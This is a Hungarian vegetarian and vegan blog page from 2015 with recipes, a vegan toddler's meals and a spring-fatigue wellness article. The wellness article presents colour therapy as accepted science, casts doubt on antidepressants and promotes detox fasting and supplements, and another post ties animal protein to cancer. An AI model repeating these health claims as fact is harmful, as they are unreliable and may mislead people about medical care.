hanem sok C-vitamint tartalmazó táplálékkal (pl. paradicsommal) fogyasztják, akkor a szervezet több vasat képes hasznosítani belőle." Forrás: vitamin.dynanix.com sütőben sült spenótos bundáskenyér, friss piros zöldségsalátával ELKÉSZÍTÉS: A kenyeret - szép magyar szóhasználattal élve - felkatonázzuk. A tojás egyik felét felverjük egy mélyebb tálban, a másik felét pedig összeturmixoljuk a megmosott friss spenót levelekkel. A snidlinget belekarikázzuk a sárga illetve a ,,zöld tojásba is. Mindkét tojást sózzuk, borsozzuk ízlés szerint, majd beleszórjuk a kenyér katonákat. Egyik felét a sárgába, másik felét a zöldbe. Jól belenyomkodjuk őket, hogy a kenyér katonáknak legyen lehetőségük felszívni a nyers tojást. A sütőt előmelegítjük 200°C fokra. Előveszünk egy kisebb jénai tálat, és kókuszzsírral vékonyan kikenjük. Az aljába öntjük a sárga snidlinges kenyérkockákat, megszórjuk a tetejét szezámmaggal, majd ráöntjük a zöld snidlinges kenyeret is. Betesszük a sütőbe, és kb. 15-20 perc alatt készre sütjük. Akkor van kész, ha a tojásból sült rántotta lesz. :-D Fogyasztás előtt szórjuk meg sörélesztő pehellyel a még jobb ízhatás és magasabb tápanyagtartalom érdekében. Elfér még rajta a kendermag is, de csakis közvetlen fogyasztás előtt. ;-) Sőt! Balázs mustárt tett a tetejére, és úgy fogyasztotta ezt a spenótos-sült bundáskenyeret. sütőben sült spenótos bundáskenyér mustárral és sörélesztőpehellyel a tetején Mint minden étel mellé, most is érdemes friss, roppanós zöldség salátát készíteni, mert nem csak könnyebben csúszik az étel, de az emésztést is elősegíti a nyers zöldség, akármit is fogyasztunk mellé. A nyers zöldségek magas víztartalmuknak köszönhetően élvezetesebb étkezést is biztosítanak. Ezúttal egy piros salátát dobtam össze a zöldes étel mellé. friss, piros, nyers zöldségsaláta A salátához a paradicsomot, piros vastaghúsú pritamin paprikát, a sárgarépát és a retket tetszés szerinti méretben feldarabolom, és egy tálban összekeverem. Kész is! Nem kell sem öntet, sem olaj rá, mert a természet már ellátta ízekkel, és folyadék tartalommal, csak adnunk kell egy esélyt az ízlelőbimbóinknak, hogy újra megszokják a természetes ízeket. ;-) sütőben sült spenótos bundáskenyér Tápanyagban gazdag, zsiradékban szegény, időtakarékos, zöld bundáskenyér készítést, majd fogyasztást kívánok mindenkinek! ;-) Megjegyzés: Úgy nőttem fel, hogy nálunk a spenót levelet önmagában, nyersen sosem fogyasztottuk. Spenót főzelékként pedig nem voltam hajlandó megenni. :-) Így gyakorlatilag spenót mentesen telt a gyerekkorom, pedig nyersen fogyasztva az egyik legtáplálóbb saláta zöldség, ami akár egy szendvicsbe is jól passzol. Felnőttként próbálom pótolni az elvesztegetett gyerekkori spenót bevitelt, és igyekszem Popey a tengerész nyomdokaiba lépni, úgyhogy ilyen-olyan formában szerves része az étkezéseinknek a friss spenót levél. ;-) Íme néhány korábbi recept, ami tartalmaz friss spenót levelet: nyers rakott káposzta, Fetás-mandarinos tészta saláta, vagy a bambuszrügyes kínai pirított rizs. És a spenót fogyasztás lehetséges alternatíváinak listája a jövőben folyamatosan bővül... Maradjatok velem! ;-)
Vedd fel a harcot a tavaszi fáradtság ellen!
2015. április 7. Éltető ételek
Itt a tavasz. Megérkeztek a gólyák, a fecskék, nyílnak a tulipánok, a nárciszok, aranylóan süt a nap. És mi nemhogy örülnénk ennek, egyre több nyavalya kerülget bennünket. Fáradtak, ingerlékenyek vagyunk, fáj a fejünk, rosszul alszunk, rossz a közérzetünk. Frontok jönnek-mennek, reggel hideg van, délután meleg. Csodás ez a napsütés, hiszen boldogsághormon "endorfin" termelődik, emelkedik a vérnyomás, tettre készek vagyunk. Viszont túl gyors ez a változás, ez a hőmérséklet ingadozás. Szervezetünk nem tud ilyen gyorsan alkalmazkodni, hangulatingadozás, fejfájás, alvásprobléma jelentkezik. Sok esetben ez egyenes út a depresszióhoz. Erre még egy lapáttal rátesz az óraállítás. 1 órát "elloptak" a napunkból. Bizony, a biológiai óránknak ezt nehéz behoznia. És ez nemcsak minket, felnőtteket érint, hanem a gyerekeinket is. Ők is sokkal fáradtabbak, ingerlékenyebbek, az iskola hatalmas terhet ró rájuk. Bizony ők is "dolgoznak" napi 8 órát az iskolában. Ezenkívül még azt is fontos megemlíteni, hogy a vitamin- és ásványianyag-raktárunk bizony jócskán megcsappant . Nincs nagy választék gyümölcsökből, a zöldségek még az előző év termései, ilyenkor csak üvegházas "kényszerérett paradicsomok" vagy a spanyol, marokkói, olasz eprek, paprikák, cukkinik, padlizsánok stb. kaphatók. Igaz, megjelentek az újhagymák, retkek, saláták. De a legfontosabb, amit a természet ilyenkor ad nekünk: a ZÖLD levelek . Nő a sóska (vadsóska), a medvehagyma, menta, citromfű, csalán, árvacsalán, gyermekláncfű, lucerna, galaj, lóhere, tyúkhúr és még sorolhatnám. Épp ma voltam a Tisza gáton futni, hát az a kánaán, ami ehető zöld levelekből volt: CSODÁS. Könnyen kaphatunk a tüneteinkre az orvosoktól antidepresszánst, de valóban erre van szükségünk? Mit tehetnénk ellene? Vasraktárunk feltöltése A nőknél a vashiány (vérszegénység) is okozhat fáradékonyságot, amelyet a menstruációs ciklus is "elősegít". A csalán, mák, petrezselyem, ezerjófű, algák, búzafű, virágpor szintén fogyaszthatók vérszegénység esetén. Tehát mindenképp oda kell figyelni vasraktárunkra. A vas felszívódását elősegíti a C vitamin, gátolja a tej, a csersavak (teák), a foszfát (tej) és az oxalátok. Táplálkozás Alapvetően a cél a teljes értékű táplálkozás. Kerüljünk mindenféle finomított (halott) élelmiszert. Stressznövelő élelmiszerek : fehér cukor, kávé, kakaó, csoki, fekete tea, alkohol. Ne terheljük le a szervezetet nehéz, zsíros ételekkel, törekedjünk az egyszerű, vegetáriánus étkezésre. Együnk minél több nyers ételt. A zab kifejezetten jótékony hatással van az idegrendszerre. Mivel a tavasz a méregtelenítés időszaka, ezért törekedjünk olyan ételek fogyasztására, amelyek a májat és az epehólyagot támogatják. Csökkentsük a sós ételek fogyasztását, részesítsük előnyben a friss zöldségeket, csírákat, gabonafüveket. Helyezzük előtérbe az édes és a csípős ízeket. Nagyon jó ilyenkor a mézes mentatea. Használjunk minél több csípős fűszernövényt ételeink készítésénél (bazsalikom, rozmaring, majoranna, borsikafű, kömény, kapor, babérlevél). A gabonafélék és hüvelyesek kellőképpen édesek, és ezt fokozhatjuk csíráztatással. Kiválóan beilleszthető az étrendbe a medvehagyma. A fekete üröm édes-csípős kombinációja is kiváló ezekben az időkben. Együnk minél több nyers vöröshagymát, fokhagymát. Az ételek főzése leegyszerűsödik: rövidebb ideig, de magas hőfokon készítsük, ezáltal az étel belseje nem fő át annyira. Fogyasszunk algákat. Nagyon fontos a vitaminokban és ásványi anyagokban gazdag ételek fogyasztása: csíraőrlemények, csírák. Ezzel a táplálkozással az immunrendszerünk is erősödik, ellenállóbbá válik. Kellő folyadékfogyasztás Igyunk sokat: víz, frissen préselt zöldség és gyümölcslevek és gyógyteák (zöldtea, ginseng, ginko biloba, varjúháj, ezerjófű) formájában. Iktassuk be a napi étkezésünkbe a zöld turmixot . Itt a lényeg a klorofill, amely a zöld színt adja a növényeknek. Ezt felturbózhatjuk superfoodokkal. Csodákra képes a búzafűlé. Viszont sokan nem bírják az illatát, ízét, és a mindennapi elkészítése is elég macera a napi teendők mellett. Erre egy remek megoldás ez a búzafű por, amellyel a zöld turmixunkat remekül felturbózhatjuk. Vitaminok és ásványi anyagok a fáradtság leküzdéséhez A legfontosabb a C- és E-vitamin, valamint a réz, jód, vas és a magnézium. Természetes C-vitamin forrás többek között pl. a homoktövis, a csipkebogyó, a camu camu és a goji berry. Egy egészséges élő szervezetnek minimum 70 féle ásványi anyagra, mikroelemre, nyomelemre lenne szüksége. Támogassuk az idegrendszert Igyunk nyugtató hatású gyógynövényeket, ezekből tea fogyasztható, vagy illóolajukat párologtathatjuk, masszázsolajakhoz hozzátehetjük: levendula, orbáncfű, kamilla, bergamott, jázmin, rózsa, citromfű, ánizs, golgotavirág, rozmaring, macskagyökér. Készíthetünk álompárnát szárított gyógynövényekből (levendula, kamilla, citromfű, orbáncfű, zabszalma). Mozdulj meg! Kezdj el mozogni! Tudom, a hátad közepére kívánod, hív az ágy, de vegyél erőt magadon, és menj ki a természetbe, sétálj, kirándulj. A mozgás antidepresszáns hatását több tanulmány is bizonyítja. Minél fáradtabbnak érzed magad, annál jobban fog esni egy kis séta, kocogás a természetben. Télen sajnos bezárkózunk a lakásba, most itt az idő, menjünk ki a szabadba, a friss levegőre. Gyűjtsél medvehagymát, zöld leveleket, ezzel megszerzed a zöldturmixod alapját is. A jóga is jótékonyan hat az idegrendszerre, és segít a megfelelő légzés elsajátításában. Teljesítmény fokozására és a fáradékonyság leküzdésére próbáljuk ki a Performax Forte-t. Négy különböző cordyceps fajtát tartalmaz, valamint rózsavarjúhájat, amelyet a "százévesek gyökerének" is neveznek. Érdemes a macát is kipróbálni, amely kiváló teljesítményfokozó. Teljes megújulás - méregtelenítés A tavasz a megújulás, a méregtelenítés időszaka. Milyen érdekes, ilyenkor könnyedén találunk csalánhajtásokat, ami kitűnő vértisztító, méregtelenítő hatású. A szervezetnek is meg kell újulnia, meg kell tisztulnia. Nemhiába van húsvét előtt a 40 napos böjt. Egy pár napos gyümölcsnap vagy léböjt fantasztikus megújulást, felfrissülést ad a szervezetnek. Hívjuk segítségül a fizioterápiát A hidroterápia ősidők óta ismert. A Kneipp-féle hidroterápiás módszerek közül a váltó lábfürdő, a váltózuhany, a szauna, a reggeli frottírozás, a hideg vizes lábszárleöntés, a harmatos fűben járás segíthet. Használjunk frissítő hatású masszázs- és fürdőolajakat. A fény növeli a szervezet szerotoninszintjét, ezért depresszió esetén egyszerű módszer a napfürdőzés. Üljünk ki a napra, csukjuk be a szemünket, és napoztassuk arcunkat, testünk minél nagyobb részét. Nevessünk sokat A nevetés serkenti az immunrendszert, különösen az úgynevezett természetes ölő sejtek működését. A nevetés hatására endorfinok szabadulnak fel, és agyunkban örömérzet keletkezik. Nevess szívből minél többet! Lássuk színesben a világot! A színterápia egy elfogadott tudományág. Kutatások bebizonyították, hogy egyes színek pozitívan hatnak fáradékonyság, depresszió és feszültség esetén. Az idegi eredetű zavarokra, lelki kimerültségre és hasonló panaszokra nagyon jó az indigó szín. A kék nyugtat, lazít. A lila a meditáció színe, nyugtatja, harmonizálja az idegrendszert. Ha idegesek vagyunk, és nem tudunk aludni, a kék színtől remélhetjük a megnyugvást és az ellazulást. A narancssárga általános frissítőként működik, elűzi a depressziót. A sárga a nap színe, ezáltal meleget és lelkesedést sugároz. Idegrendszerünket és emésztőszerveinket jó munkára ösztönzi, hangulatunkat az optimizmus irányába vezeti. A méregtelenítő szervek: a máj, a vesék és a húgyhólyag működését ösztönzi és erősíti. A zöld a természet, növekedés színe. Csökkenti a kimerültséget és a fáradtságot. Hogy szépek is legyünk Törődjünk egy kicsit magunkkal. Készítsünk test- és arcpakolásokat, frissítsük fel a hajunk állapotát. Nagyon fontos a pihentető alvás, ezért éjfél előtt már bújjunk ágyba.
Smoothie bowl, avagy az ehető szuper turmix
2015. április 1. Zizi kalandjai
A The Telegraph egyik februári cikke szerint a legújabb kaja trend a smoothie bowl, azaz magyarul valami ilyesmit jelent: turmix tálban felszolgálva, de állagából adódóan gyümölcsös joghurt krémfagylalt is lehet. Tehát ez egy olyan smoothie/turmix, amit inkább eszünk, mint iszunk, mivel az állaga egy kicsit sűrűbbre van hagyva. Trend vagy nem trend, mi imádjuk! A fotón lévő kisebb tálkából Ádi evett, általában kétszer-háromszor repetázik, szóval akkora adagot eszik a végén, mint én! Nagy népszerűségének köszönhetően hetente többször ezt reggelizzük mostanában. És, hogy miből áll össze a smoothie bowl? Van benne: – gyümölcs (banán édesítés és krémesség miatt, avokádó, bogyós gyümölcsök vagy citrusfélék) – leveles zöld (spenót, mángold, leveleskel, stb.) – szuperélelmiszer (kendermagliszt, chia mag, stb.) – fehérje + zsiradék (mandulavaj, földimogyoróvaj, stb.) – folyadék (többnyire növényi tej vagy kókuszvíz) A banánt és az avokádót frissen teszem bele, azonban a bogyós gyümölcsöket fagyasztott állapotban, így ez kellemesen hűssé teszi és tényleg krémes fagylalt jelleget ad neki. Nyáron kiváló reggeli lesz a nagy melegben. Leveles zöldek közül olyat válasszunk, aminek semleges íze van. A szuperélelmiszerek tárháza kifogyhatatlan, szinte az egész smoothie bowl szuperélelmiszerek hada, de ha még pluszban akarunk hozzáadni valamit, akkor kísérletezhetünk kendermagliszttel, chlorrelával, spirulinával, búzafű porral, stb. Én most kivételesen nagyon extrát tettem bele, baobabot, amit ajándékba kaptam Angliából (már itthon is kapható egyébként). A baobab – másnéven majomkenyérfa – az afrikai tájképek jellegzetes fája. A gyökerétől a terméséig minden részét táplálékként használják fel. A gyümölcshúsnak igen magas a C- és B vitamin, valamint kálcium tartalma. A benne lévő rostok hatékonyan hatnak az emésztésre. Afrikában az egyik legjelentősebb haszonnövény. Nagyon érdekes a baobab legendája… “A teremtés hajnalán az első fa a baobabfa volt. Őt követte a sudár és kecses pálmafa. Amikor a baobabfa meglátta a pálmafát, rögtön sírni kezdett: hadd lehessen magasabb… Eztán feltűnt a tűzvörös juhar lángoló virágaival, és a baobabfa rögtön irigy lett a csodás virágokra. Végül a baobabfa megpillantotta a fönséges fügefát, és gyümölcsökért fohászkodott. Erre az istenek nagyon dühösek lettek, megfogták a baobabfát, kitépték a földből, és fejre állítva újra elültették, hogy végre elhallgasson.” (Forrás: AntalVali.com) Gazdagabbá tehetjük reggelinket, ha adunk hozzá mandulavajat, földimogyoróvajat vagy kesudióvajat. Növényi tejek közül pedig bármelyik megfelel, legyen az kókusztej, zab-, rizs-, mandula- vagy diótej. Mivel sűrű joghurt állaga lesz, a tetejére mindenképpen ajánlok valami ropogtatnivalót! Tudom, ez egy költségesebb reggeli, ha az alapanyagokat nézzük, de azért lehet a költségeken faragni: banánt, avokádót lehet nagyon sokszor akciósan kapni egyes élelmiszer üzletekben (én ma pl. kiváló Hass avokádókat vettem a Lidlben 175 Ft/db áron). A fagyasztott bogyós gyümölcsök szerintem olcsóbbak, mint a frissek. A leveles zöldek szezonális áron kaphatók lassan a piacokon. Az extra szuperélelmiszer porokat el is hagyhatjuk, ez csak extra, enélkül is kiváló lesz a krémes joghurtunk. Viszont rakhatunk bele lenmagot vagy chia magot. A magvajakat és a növényi tejeket pedig mi magunk is elkészíthetjük házilag. A hozzávalók tárháza kifogyhatatlan, a fantáziátokra bízom, hogy milyen smoothie bowl-t csináltok magatoknak. Küldjetek róla egy képet, ha kipróbáltátok és ízlett! Málnás smoothie bowl Hozzávalók 3 főre: – 1 db banán, meghámozva, felszeletelve – 1/2 avokádó, kanállal kikapart húsa – egy kisebb marék leveleskel – két közepes maréknyi fagyasztott málna – 2 evőkanál zabpehely – 1 evőkanál mandulavaj – 1 evőkanál lenmag – 1/2 evőkanál chia mag – 3 teáskanál baobab por – 1/2 teáskanál fahéj – kb. 300 ml mandulatej vagy egy kicsivel több, attól függően, hogy milyen állagúra szeretnénk – tetejére: hántolt kendermag, pirított natúr napraforgómag vagy tökmag, goji bogyó Tegyünk minden hozzávalót a turmixgépbe és pépesítsük simára néhány perc alatt. Ha túl sűrűnek találjuk, adjunk még hozzá egy kis mandulatejet. Adagoljuk tálkákba és tálaljuk pirított napraforgómaggal, goji bogyóval megszórva.
Mit eszik a vegagyerek (vegán baba)? + SkipHop kedvezmény kupon
2015. március 27. Zizi kalandjai
A vegagyereknek továbbra is kiváló az étvágya. Mostanában elég nagy adagokat eszik, sokszor repetázik és szépen lassan, komótosan eszik, megadja az étkezésnek az időt. Nem tudom ki hogyan főz, főleg miután anya lesz, de nálam manapság a villámgyors kaják is minimum másfél óráig tartanak. Ugyanis megy a multitaskingolás… avagy főzés közben intézek minden mást is: játszom Ádival, énekelek neki; felveszem, hogy ő is meg tudja keverni az ételt; megengedem azt a luxust, hogy végre fogat mossak, elmenjek a mellékhelyiségbe; ha szuperhős vagyok, már ilyenkor megcsinálom a mosást, teregetést és akkor nem kell ebéd utánra hagyni; nyomkodom a telefonomat; takarítok; meg minden egyéb váratlan dolgot csinálok, ami közbejöhet. Ki ismer magára? Az manapság luxus kategóriába tartozik, hogy kivonuljak a konyhába, csak a főzésre koncentráljak és tényleg villámgyorsan megfőzzek, megsüssek valamit. Mindezt nem panasznak szántam, igazából jól is esik, hogy egy délelőtt alatt ilyen sok mindent meg tudok csinálni és így nyugodtan dőlhetek be az ágyba Ádi mellé ebéd után, hogy én is szundizzak egy kicsit. Lássuk az elmúlt egy-két hónap termését… az alábbi ebédeket januárban és februárban fotóztam. Látszik a szezonális felhozatal, szinte minden tányéron szerepel a pirított leveleskel, mert annyira imádjuk és igyekszünk minél többet enni belőle mielőtt véget ér a szezon. Ez az egyedüli zöldség, amit nem ununk még tél végén sem. Azért felbukkan már a nyári ízek utáni vágyakozás padlizsán, polenta és tavaly nyárról eltett lecsó formájában. Ádi mindent megeszik, de a legnagyobb kedvencei mostanában: humusz, savanyú káposzta, kígyóuborka (egyik este a vacsora levezetéseként még megevett egyharmad kígyóuborkát!), Pipacs kenyér, leveleskel (nyersen és pirított formában is), tészta. Egy-két alkalommal már evett minimálisan édesített (juharsziruppal vagy mézzel) sütit – ízlett neki. Az igazság az, hogy várjuk már a tavaszi és nyári zöldségeket, gyümölcsöket nagyon! *** Közelgő Húsvét alkalmából pedig a SkipHop Magyarország felajánlotta, hogy kedvezménykupont biztosít a Zizi kalandjai olvasóinak! Részletek a bejegyzés végén! Pirított fokhagymás citromos leveleskel, pirított gomba, édesburgonya chips, citromos tahini szósz és főtt bulgur Sütőtök krémleves (vegánosítva), tavaszváró téli tekercs Pirított fokhagymás citromos leveleskel, póréhagyma krémes tészta és párolt brokkoli A szokásos leveleskel, gabonavirsli, főtt köles főtt rizzsel és citromos tahini szósz Nyárról eltett lecsó és tepsiben sült ropogós rozmaringos kakukkfüves burgonya Sült szójavirsli, fokhagymás citromos leveleskel, tepsiben sült répa és káposzta főtt köles és rizs keverékével Csicseriborsós padlizsánragu (ehhez nagyon hasonló) krémes polentával Az elmaradhatatlan leveleskel :), maradék savanyú káposztás kölesfasírt, sült szójavirsli, tepsiben sült rozmaringos édesburgonya citromos tahinis joghurt szósszal ***** KEDVEZMÉNYES VÁSÁRLÁSI LEHETŐSÉG A ZIZI KALANDJAI OLVASÓINAK!!! Aki 2015. március 27 és 2015. április 6-a között vásárol Skip Hop, Yeominis, Stor it vagy Frank&Fischer márkájú termékeket a Monkie oldaláról (más kedvezménnyel nem összevonható) az 10% kedvezményben részesül (a végösszegből kerül levonásra). A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI10. Jó vásárlást mindenkinek!
Mákos-kókuszos trüffel
2015. március 1. Éltető ételek
Nagyon szeretem a mákot, igazi kalciumbomba. Bár a magas kalciumtartalmán kívül számos jótékony hatással bír. Ez egy igazán egyszerű, és gyors finomság, ha valami édességre vágyunk. Hozzávalók: - 3 dkg darált mák - 3 dkg kókuszreszelék - 5 dkg datolyavaj (2-3 szem datolya) - 5 dkg aszaltszilva lekvár (kb. 5-6 db aszaltszilva) - 1/2 kávéskanál fahéj - 2-3 csepp citromolaj Elkészítése: Először is a datolyát és a szilvát vágjuk kis darabkákra, majd annyi vizet öntsünk rá, hogy éppen ellepje. Néhány óra elteltével (a datolya akár egész éjszaka ázhat) botmixerezzük össze. A mákot daráljuk le, majd mindent gyúrjunk össze. Édesítésre nincs szükség, hiszen az aszalványok kellően megédesítik, megízesítik. Forgassuk meg kókuszreszelékbe.
Csicseriborsó pörkölt citromos cukkinis barna rizzsel
2015. február 22. Zöld Avocado
Nemrégiben kaptam egy kedves ismerősömtől - aki nem mellesleg szakács - egy saját fejlesztésű receptet. Ez egy currys babos csicseriborsó recept. Erről egyből eszembe is jutott, hogy a szegény csicseriborsó, milyen mostohagyerek is az én konyhámban. A vegetáriánusok egyik legfontosabb fehérje forrása ez a hüvelyes, mely Magyarországon is egyre népszerűbb. csicseriborsó pörkölt cukkinis rizzselSajnos elég sokáig kell főzni, ezért nagyon ritkán készítek belőle ételt. :-( Ezen változtatnom kell! ;-) A csicseriborsó egy makacs hüvelyes, de megéri, mert miután megadja magát, ellátja a szervezetünket mindenféle földi jóval. :-) A szakértők szerint 1 kg csicseriborsó pontosan annyi fehérjét tartalmaz, mint 1 kg pulyka mell. A különbség az, hogy az egyik növényi fehérje (könnyebben emészthető, és értékesebb), míg a másik állati fehérje (egyes kutatások szerint az állati fehérje is felelős lehet a rákos sejtek és egyéb népbetegségek elszaporodásáért. Lásd.: Kína tanulmány). És nem utolsó sorban 1 kg csicseriborsó, sokkal olcsóbb, mint 1 kg pulykamell. :-D csicseriborsó pörkölt cukkinis rizzsel,,A csicseriborsó kevés kalóriát tartalmaz, de gazdag B1-, B6-vitaminban és folsavban, valamint E-vitamin és karotin is található benne. Ásványi anyag tartalma is kedvező, sok magnéziumot, vasat és cinket tartalmaz. Fehérjében és rostokban gazdag, így segíti emésztésünket és kiválóan alkalmas a székrekedés megelőzésére, kezelésére is. Csökkenti a koleszterinszintet, ezáltal a szív- és érrendszeri megbetegedések kialakulásának kockázatát is. Alacsony aglikémiás indexe, így cukorbetegek számára különösen ajánlott a rendszeres fogyasztása. Vastartalma növeli az energiánkat, és kimondottan fontos alapanyag menstruáló és terhes nők, vérszegények, növésben lévő gyerekek számára.Antioxidáns tulajdonsága is ismert. Forrás: http://www.hazipatika.com Előkerestem egy régebbi receptemet, amit most megosztok veletek. Ha már húspótlóként emlegetik, akkor készítsünk belőle valami tipikusan húsos ételt, ezúttal húsmentesen! ;-) CSICSERIBORSÓ PÖRKÖLT CUKKINIS BARNA RIZZSEL csicseriborsó pörkölt cukkinis rizzsel HOZZÁVALÓK: (kb. 4 személyre) - 200 g száraz csicseriborsó - 1 fej vöröshagyma - extra szűz olíva olaj - 1/2 db piros húsú paprika - 1 db nagy érett paradicsom - fűszerek: Himalája só, frissen őrölt fekete bors, piros paprika fűszer, 1 ek mustár, kevés erős (pl.: erős pista, Cayenne bors, erős paprika... kinek mi van otthon) - 2 marék friss petrezselyem - 2 db bio ételízesítő (leves) kocka - 1,5 bögre barna rizs - 1 db közepes cukkini - 1/2 citrom leve ELKÉSZÍTÉS: A csicseriborsót egy nappal (24 órával) előtte beáztatom, hogy könnyebben megpuhuljon főzés közben. A pörkölt alaphoz: 1 fej vöröshagymát olíva olajon megdinsztelek. Hozzáadok 1 fél felkockázott piros húsú paprikát, és a paradicsomot. Kicsit lepirítom a zöldségeket, majd felöntöm kb. 2 dl vízzel. Sózom, borsozom, bőven pirospaprikázom a pörkölt alapot. Mehet még bele ételízesítő kocka, mustár, egy kevés erős (kinek mi van otthon), és egy maroknyi frissen vágott petrezselyem. Az egészet összeforralom, majd hozzáadom az előre beáztatott (az áztató vízétől mentes) csicseriborsót. Felengedem annyi vízzel, hogy ellepje az egészet. Ha szükséges még teszek hozzá piros paprikát, és fedő alatt kb. 1 óra alatt puhára főzöm. (Főzés közben, ha elfő a víz, folyamatosan utána kell tölteni). Miközben fő a ,,pörkölt, elkészítjük a köretet. Én ezúttal a barnarizst választottam, mert már régen ettünk. Persze ezt is fel kellett dobni egy kicsit. ;-) A szokásos módon egy teflonos edényben kb.30 perc alatt megfőztem 1,5 bögre barna rizst, 1 bio ételízesítő kockával, és 3 bögre vízzel. Közben lereszeltem a nagy lyukú reszelőn 1 közepes cukkinit héjastul (előtte jól meg kell mosni). A lereszelt cukkinit enyhén sóztam, borsoztam, és egy marék friss petrezselyem zölddel, illetve egy fél citrom levével összekevertem. Állni hagytam az egészet (fűszeres cukkinit), míg a teljes étel elkészült, majd összeforgattam a rizzsel. A készre főtt pörköltet utó ízesíthetjük, ha szükséges. A cukkinis barnarizzsel, és egy kevés friss, ropogós jégsalátával tálalom a nagyon laktató, de könnyen emészthető ételt. csicseriborsó pörkölt cukkinis rizzsel Jó étvágyat hozzá! :-) Megjegyzés1: az említett currys babos csicseriborsó receptet is el fogom készíteni hamarosan, és akkor megosztom veletek is. Az a baj, hogy a curry egyáltalán nem tartozik a kedves ízek kategóriába nálam, de nyitott vagyok az újításokra! Ez a blog nektek szól, nem magamnak! :-) Megjegyzés2: a képen látható pörköltben tofu kockák is fürdenek, melyek egy korábbi ételből maradtak meg, és a csicseriborsó pörköltben landoltak.
A "kukoricás kutya" (corn dog)
A farsang utolsó három napja, azaz a legnagyobb mulatságok ideje kezdődik ma. A farsangvasárnaptól hamvazószerdáig tartó három nap világszerte a karnevál csúcspontja, miközben a "farsangfarki" ünneplést megtaláljuk a magyar népszokások között is. Ilyenkor "meg kellett enni mindent, meg kell inni mindent", mivel ezután már a húsvétot megelőző böjt kezdődött. [...] Bővebben!
Magyaros zöldségpörkölt
Még mielőtt egy szót is ejtenék a következő ételről, következzék minden idők leghasznosabb és leginkább hiánypótló videója arról, hogyan kell kenyeret pirítani. (A széria alkotói már dolgoznak a "Hogyan forraljunk vizet?", "Hogyan vegyünk levegőt orrnyíláson keresztül?", valamint a "Hogyan nézzünk ki az ablakon?" című oktatóvideókon is.) Most pedig a szakma alacsonyabb szintjeit boncolhatnám: Mostanában megannyi levelet kaptam kistérségi háziasszonyoktól, hogy a Mónika vegyeskereskedésben nem találnak tofut, csicseriborsót, római köményt, úgyhogy jobb híján a családnak kelkáposzta- és sóletkonzervből próbálnak kiügyeskedni valami egzotikus reformkaját. Az ő kedvükért következzék egy olyan tradicionális cucc, melyhez elegendő a kertbe kiugraniuk. Főleg most, a bográcsszezon kellős közepén. Komponensek: 1 fej vöröshagyma 2 gerezd fokhagyma 1 cukkini 3 db közepes méretű krumpli 1 marék vörösbab 3-4 fej tetszőleges gomba (galócafélék, valamint az olyan vadhajtások, mint a hipóban pácolt csiperke, kerülendőek) 2 sárgarépa 1 kaliforniai paprika 1 hegyes erőspaprika 1 evőkanál édes fűszerpaprika 1 kiskanál édes paprikakrém 1 kiskanál őrölt kömény 1 kiskanál Vegamix vagy hasonló ételízesítő só, bors A hagymát felkockázzuk, majd olajon a belenyomott fokhagymával üvegesre dinszteljük. Amíg ez el nem készül, távcsövön figyeljük a nádasban a búbos vöcskök násztáncát. Ha közben rajtakapjuk a Tutajost, hogy puskánkat vállához emeli, akkor emelt hangon rákérdezünk, hogy ezzel mégis mire akar célozni! A hagymás alaphoz hozzáadjuk a fűszereket és a paprikakrémet, majd elkeverjük és hozzápasszítjuk a felkockázott/felkarikázott zöldségeket. (Ha konzervbabot, illetve konzervgombát használunk, azt ráérünk lecsepegtetve a végén hozzáadni.) Miután többször megkevertük, kis vizet adunk hozzá, és addig pároljuk fedő alatt szolid lángon, amíg a krumpli és a sárgarépa meg nem puhul. Végül megsózzuk, borsozzuk. A Csikasz nem kap belőle, mer az pedigrépált eszik.
Banános, vaníliás chia puding
2015. január 20. Gitta nyersétel blogja
A chia magot az aztékok már ősidők óta termesztették és fogyasztották. Hozzánk csak pár éve jutott el, szerencsére... Miért szeretjük? Minden fontos tápanyagot tartalmaz, elsősorban az omega3 tartalma miatt fogyasztjuk. Folyadékba keverve zselésít, megszilárdítja a pépet, magyarul: pudingot csinál belőle. Akkor csináljunk mi is pudingot belőle! Hozzávalók: 2 dl mandulatej 3 evőkanál chia mag 1 teáskanál vaníliapor 2 banán 1 kiskanál méz (ha szükséges) 1 kis marék goji bogyó a díszítéshez A mandulatejhez hozzákeverjük a chia magot, vaníliaport, és a villával szétnyomkodott banánt. Ha nem elég érett a banán, egy kevés mézet tehetünk bele. Poharakba töltjük és a tetejét megszórjuk goji bogyóval. 30 perc múlva a chia mag megduzzad, magába szívja a nedvességet, és kész a puding! A chia magról bővebben olvashatsz itt: PlanetBIO és most ugyanitt megrendelheted 25%-os kedvezménnyel!
Tökéletes nyers céklasaláta, avagy így integráld az ellenpólusokat
2015. január 18. Szelíd életmódváltók
Szakmai áldás, hogy még egy receptet is önismerettel fűszerezek. Ez van, ezt szeretem. Akkor ismét csak a teremtéstörténettel kezdem. Lehet, hogy tudod, lehet, hogy nem, de két teljesen ellentétes szülő gyermekeként jöttem a világra. Nem állok neki felsorolni mindent, csak annyit, amennyi a recepthez szükséges: anyukám lett, ami annyit jelent, hogy északi módon étkeztünk, szinte mindent tejföllel ettünk, meg köménnyel. Apukám meg grúz volt, Ha minimum 5 fajta fűszernövény nem került az ételbe, akkor egy se, meg nincs rendes saláta koriander, fokhagyma és dió nélkül. Hogy emellett is legyen kis kihívás, éppen nyers kihívás kellős közepén vagyok, tehát bármit is készítek, az nyers és vegán. Magyarul, nincs tejfölös cékla saláta…de, helyette született tökéletes nemzeteken túlmutató vitaminbomba. Hatástalanítani szigorúan tilos Hozzávalók (1 személyre, tehát kis matektudással a mennyisége szaporítható) 1 közepes cékla 1 közepes alma 1 gerezd fokhagyma köménymag só, bors koriander vagy petrezselyem zöldje pár szem dió (előtte beáztatott, kiszárított) Púpozott evőkanál magtejföl* Magtejföl (Zöld Múzsától tanultam, örök hála!) 1 tálka napraforgó mag (előtte beáztatva) citromlé só 1 ek oliva olaj 1 tk édesítőszer (ki mit szeret vagy használ, lehet sztevia, méz, agavé) Víz (sűrűséget turmixolás közben érdemes figyelni, de kb. fél pohár) Mindezt összeturmixolni Elkészítés: céklát, almát és fokhagymát apró lyukú reszelőn lereszelünk és összekeverjük a többi belevalóval. Rászórjuk az apróra vágott diót és zöldeket. Ropogós aszalt keksszel megismételhetetlen! Nem is beszélve arról, hogy mennyire egészséges. Szeretettel és akcentussal, Rita Bakradze komfortzóna tágító, coach, önismereti és kreativitásfejlesztési tréner www.vegtelenlehetoseg.hu (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js 